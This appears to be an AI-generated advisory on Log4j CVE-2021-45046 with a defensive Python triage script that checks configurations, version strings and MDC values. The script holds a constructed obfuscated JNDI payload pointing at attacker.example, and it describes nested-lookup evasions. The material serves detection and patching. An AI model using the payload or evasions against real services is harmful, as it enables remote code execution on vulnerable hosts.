CVE-2021-45046 is a critical vulnerability in Apache Log4j 2 that exists because the fix for CVE-2021-44228 shipped in Log4j 2.15.0 was incomplete in certain non-default configurations. An attacker who controls Thread Context Map (MDC) input data can exploit deployments whose logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) by supplying a value that contains a JNDI Lookup pattern. Because the lookup is resolved while the layout is rendered rather than in the log message itself, the 2.15.0 message-lookup restrictions do not apply to it. The result is an information leak and remote code execution in some environments, and local code execution in all environments.
The vulnerability is rated critical with a CVSS score of 9.0 (it was initially scored 3.7 before the impact was reassessed). An attacker who reaches the exposed logging path can read sensitive data or execute code on the affected host.
Organizations should prioritize patching immediately. The fix shipped in Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7), which remove support for message lookup patterns and disable JNDI functionality by default. Note that the mitigations many teams applied for CVE-2021-44228 on older releases, such as setting log4j2.formatMsgNoLookups=true or using %m{nolookups}, only disable lookups inside the message and do not cover the pattern-layout path this CVE describes; upgrading is the only complete remediation.
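The following Python triage script is an added example, not code from this page or from the Apache Log4j project. It models the three conditions described above: whether a log4j2.xml PatternLayout uses a Thread Context Map pattern or Context Lookup, whether a value bound for the MDC carries a JNDI lookup, and whether a deployed version falls on one of the fixed lines the advisory names (2.16.0+ and 2.12.2+). The sample configurations and the attacker-supplied value are constructed for the example; the handling of nested lookups such as ${lower:j} and ${::-j} reflects evasions seen in the wild rather than anything stated on this page.

```python
"""Triage helpers for CVE-2021-45046 (example code, not from the Log4j project).

  1. exposed_patterns():     does the PatternLayout use %X/%mdc/%MDC or
                             ${ctx:...}/$${ctx:...}?  Default layouts do not.
  2. contains_jndi_lookup(): does an MDC-bound value carry ${jndi:...}, even
                             when wrapped in nested case/default lookups?
  3. is_fixed_version():     is the Log4j 2 version on a fixed line?
"""
import re
import xml.etree.ElementTree as ET

# Pattern-layout features named in the advisory.
_MDC_PATTERN = re.compile(r"%(?:X|mdc|MDC)\b")
_CTX_LOOKUP = re.compile(r"\$\$?\{ctx:")

# Lookups that wrap a single character to hide the literal string "jndi":
#   ${lower:J} / ${upper:j}      -> J / j
#   ${::-j} / ${env:MISSING:-j}  -> j   (the ":-default" form)
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_WRAP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookups(value: str) -> str:
    """Collapse nested case/default lookups until the string stops changing.

    Every substitution strictly shortens the string, so the loop terminates.
    """
    prev = None
    while prev != value:
        prev = value
        value = _CASE_WRAP.sub(lambda m: m.group(1), value)
        value = _DEFAULT_WRAP.sub(lambda m: m.group(1), value)
    return value


def contains_jndi_lookup(value: str) -> bool:
    """True if the de-obfuscated value carries a ${jndi:...} lookup."""
    return "${jndi:" in normalize_lookups(value).lower()


def exposed_patterns(log4j2_xml: str) -> list:
    """Return the PatternLayout patterns that route MDC data through lookups.

    Handles both <PatternLayout pattern="..."/> and the nested
    <PatternLayout><Pattern>...</Pattern></PatternLayout> form.
    """
    root = ET.fromstring(log4j2_xml)
    findings = []
    for layout in root.iter("PatternLayout"):
        pattern = layout.get("pattern")
        if pattern is None:
            child = layout.find("Pattern")
            pattern = child.text if child is not None else ""
        pattern = pattern or ""
        if _MDC_PATTERN.search(pattern) or _CTX_LOOKUP.search(pattern):
            findings.append(pattern)
    return findings


def is_fixed_version(version: str) -> bool:
    """Fixed per the advisory: 2.16.0+ (Java 8 line) or 2.12.2+ (Java 7 line).

    2.15.0, the first CVE-2021-44228 fix, is still exposed; that is the point
    of this CVE.  Only Log4j 2.x version strings are meaningful here.
    """
    parts = version.split(".")
    if len(parts) < 3 or parts[0] != "2":
        raise ValueError("expected a Log4j 2.x version such as 2.15.0")
    minor, patch = int(parts[1]), int(parts[2].split("-")[0])
    return minor >= 16 or (minor == 12 and patch >= 2)


# Constructed sample configurations (not taken from any real deployment).
VULNERABLE_CONFIG = """<Configuration>
  <Appenders>
    <Console name="stdout">
      <PatternLayout pattern="%d %p user=%X{loginId} req=$${ctx:requestId} %m%n"/>
    </Console>
  </Appenders>
</Configuration>"""

DEFAULT_CONFIG = """<Configuration>
  <Appenders>
    <Console name="stdout">
      <PatternLayout>
        <Pattern>%d %p %c{1.} [%t] %m%n</Pattern>
      </PatternLayout>
    </Console>
  </Appenders>
</Configuration>"""

# Constructed attacker-supplied MDC value using nested-lookup obfuscation.
OBFUSCATED_VALUE = "${${lower:J}${::-n}di:ldap://attacker.example/a}"


if __name__ == "__main__":
    print("exposed patterns:", exposed_patterns(VULNERABLE_CONFIG))
    print("default config exposed:", bool(exposed_patterns(DEFAULT_CONFIG)))
    print("obfuscated value is jndi:", contains_jndi_lookup(OBFUSCATED_VALUE))
    for v in ("2.15.0", "2.16.0", "2.12.1", "2.12.2"):
        print(v, "fixed" if is_fixed_version(v) else "EXPOSED")
```

The configuration check is a static triage aid: a %X or ${ctx:} pattern only matters when the MDC values it prints can be influenced by untrusted input (for example a user name or header copied into the context), and a clean default layout on an unpatched 2.15.0 is still one configuration change away from exposure. Treat the version check as the deciding signal and the other two as prioritization hints.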
This vulnerability is actively exploited and is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. Numerous organizations have reported exploitation attempts, which underscores the urgency of patching; leaving it unaddressed exposes systems to the remote and local code execution described above.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.